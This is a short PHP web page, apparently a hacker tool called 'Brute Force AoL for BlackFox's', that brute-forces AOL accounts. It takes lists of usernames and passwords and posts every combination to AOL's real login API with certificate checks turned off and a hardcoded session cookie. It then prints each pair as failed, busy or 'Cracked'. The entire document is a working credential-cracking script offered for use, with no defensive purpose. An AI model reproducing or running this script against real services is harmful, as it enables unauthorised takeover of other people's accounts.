BF AoL

1. <title>Brute Force AoL</title>
2. <style type="text/css">
3. html {
4.         background: url(https://cdn-d4d.kxcdn.com/wp-content/uploads/2015/07/hacker_wallpapers-1.jpg) no-repeat center center fixed;
5.         -webkit-background-size: cover;
6.         -moz-background-size: cover;
7.         -o-background-size: cover;
8.         background-size: cover;
9. }
10. </style>
11. <style>
12. input[type=text] {
13.     padding:5px;
14.     border:2px solid #ccc;
15.     -webkit-border-radius: 5px;
16.     border-radius: 5px;
17. }
18.  
19. input[type=text]:focus {
20.     border-color:#333;
21. }
22.  
23. input[type=submit] {
24.     padding:5px 15px;
25.     background:#ccc;
26.     border:0 none;
27.     cursor:pointer;
28.     -webkit-border-radius: 5px;
29.     border-radius: 5px;
30. }
31. </style>
32. <center>
33. <br><br><br>
34. <form action="" method="post">
35. <center>
36. <font color="red">Brute Force AoL for BlackFox's</font><br><br><br>
37. <font color="red"> Usernames :<br><textarea style="width: 209px; height: 107px;" name='usernames'></textarea></font><br><br><br><font color="pink">-------------------</font><br>
38. <font color="red"> Passwords :<br><textarea style="width: 209px; height: 107px;" name='passwords'></textarea></font><br><br><font color="pink"> ==== </font><br><br>
39. <input type="submit" value="Cracking">
40. </center>
41. </form>
42. <?
43. $usernames = explode("\r\n", htmlentities($_POST['usernames']));
44. $passwords = explode("\r\n", htmlentities($_POST['passwords']));
45. foreach($usernames as $user)
46. {
47. foreach($passwords as $pass)
48. {
49.    
50. $aol = curl_init();
51. curl_setopt($aol, CURLOPT_URL, "https://api.screenname.aol.com/auth/xlogin");
52. curl_setopt($aol, CURLOPT_SSL_VERIFYPEER, false);
53. curl_setopt($aol, CURLOPT_RETURNTRANSFER, 1);
54. curl_setopt($aol, CURLOPT_FOLLOWLOCATION, 1);
55. curl_setopt($aol, CURLOPT_HTTPHEADER, array(
56.     'api.screenname.aol.com',
57.     'Connection: keep-alive',
58.     'Cookie: OASC=v1|openauth_server_e|3|mhOM-qjTD5F5O63opA9jM-840Dz-G5TsavY3wpYoTtGjGejI1pXimdftiOrXrn6e_pJoGcNMJjfiYDsBsYPp6k85UL7zE01HepA8ESukLf40ybuWHEA3ucwdETw7FiHpBquzXj_ziVhqzhUQLKCTHvvYxWzjKXHT714b2NnzdJkPE416EpMByyPC9yEXogF1IK_gc1AKzzGJtXYuJYbJevZy2QMNTq8tnpzU5F-ynNkfjjFqirXj3gKJM1ODSfPdaYauXz768_ifjqqqSHGjwoHWt6au3jqG3zVBJbPI5Fl-FDToz9YA-T40Nh_KQtUqt_hFOeEKQOR9uBLFss4NcLyAoV4tK9dSiTjY1kNqNTCE3SST4MHspp34Glk90YCIiLt3oElOOel6NnNf7x0zBQ|openauth_server_m|3|4vl5Z3DrjoVW_cDjxSRC2SmhP1ooLRLqkaUjIYmQowE;'
59.     ));
60. curl_setopt($aol, CURLOPT_POSTFIELDS, "k=ls1FxOtOMm5oLzIL&succUrl=&r=&f=&c=&authMethod=&tokenType=&usrd=3114671&md5=&sig_sha1=&sig_sha256=&idType=SN&uiType=&language=&doSNSAuth=-1&forceRateLimit=false&oauth_token=&uiAction=PASSWORD&fb_binding=&loginTab=&openid_binding=&supportedIdType=SN&loginId=$user&pwd=$pass");
61. curl_setopt($aol, CURLOPT_HEADER, 1);
62. curl_setopt($aol, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
63. $response = curl_exec($aol);
64. if(eregi("<statusCode>460</statusCode>", $response))
65.     {
66.         echo "<font color='red'>Auth Busy</font>-> [$user:$pass]<br>";
67.     }
68.     else
69.     {
70.         if(eregi("<statusCode>330</statusCode>", $response))
71.             {
72.                 echo "<font color='white'>Failed Login</font>-> [$user:$pass]<br>";
73.             }
74.             else
75.             {
76.                 echo "<font color='green'>Cracked:[$user:$pass]</font><br>";
77.             }
78.     }
79. }}
80. curl_close($aol);
81. ?>